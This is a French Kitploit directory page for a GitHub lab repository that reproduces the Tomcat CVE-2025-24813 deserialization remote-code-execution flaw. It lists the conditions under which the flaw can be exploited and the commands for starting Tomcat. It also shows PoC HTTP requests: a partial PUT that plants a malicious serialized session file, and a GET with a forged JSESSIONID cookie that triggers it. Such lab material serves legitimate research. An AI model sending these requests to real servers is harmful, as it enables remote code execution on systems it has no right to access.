Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24813 — Environnement RCE de désérialisation tomcat CVE-2025-24813 | Kitploit
Outils/GitHubGitHub/x1ongsec/cve-2025-24813
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubx1ongsec/cve-2025-24813

CVE-2025-24813

Environnement RCE de désérialisation tomcat CVE-2025-24813

Voir le dépôt
28il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Description

Ce dépôt est un environnement de reproduction de la dernière RCE (CVE-2025-24813) de Tomcat.

À des fins d'apprentissage et de recherche uniquement !

Conditions d'exploitation

  • L'application a activé la fonction d'écriture du DefaultServlet, désactivée par défaut
  • L'application prend en charge les requêtes PUT partielles, ce qui permet d'écrire des données de sérialisation malveillantes dans le fichier de session ; cette fonctionnalité est activée par défaut
  • L'application utilise la persistance de session par fichier de Tomcat ainsi que l'emplacement de stockage des sessions par défaut ; une configuration supplémentaire est requise
  • L'application contient une bibliothèque présentant une vulnérabilité de désérialisation, par exemple commons-collections présente dans le classpath ; cette condition dépend du fait que l'implémentation métier repose ou non sur une bibliothèque disposant d'une chaîne d'exploitation par désérialisation

Cet environnement a déjà activé les conditions requises pour la reproduction ci-dessus

Démarrer Tomcat

Linux :

root@kitploit:~
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run

Windows :

root@kitploit:~
apache-tomcat-9.0.98/bin/catalina.bat run

Accès : http://127.0.0.1:9001/

image

POC

Générez un fichier de sérialisation malveillant, puis téléversez-le à l'aide du paquet suivant. Notez que la valeur de la plage (Range) doit correspondre à Length et être supérieure à la longueur actuelle du fichier.

root@kitploit:~
PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{反序列化文件内容)}}

Déclenchez-le à l'aide du POC suivant :

root@kitploit:~
GET / HTTP/1.1  
Host: 192.168.131.32:8080  
Cookie: JSESSIONID=.xxxxx
image
image

Référence : https://forum.butian.net/article/674

Télécharger l’outil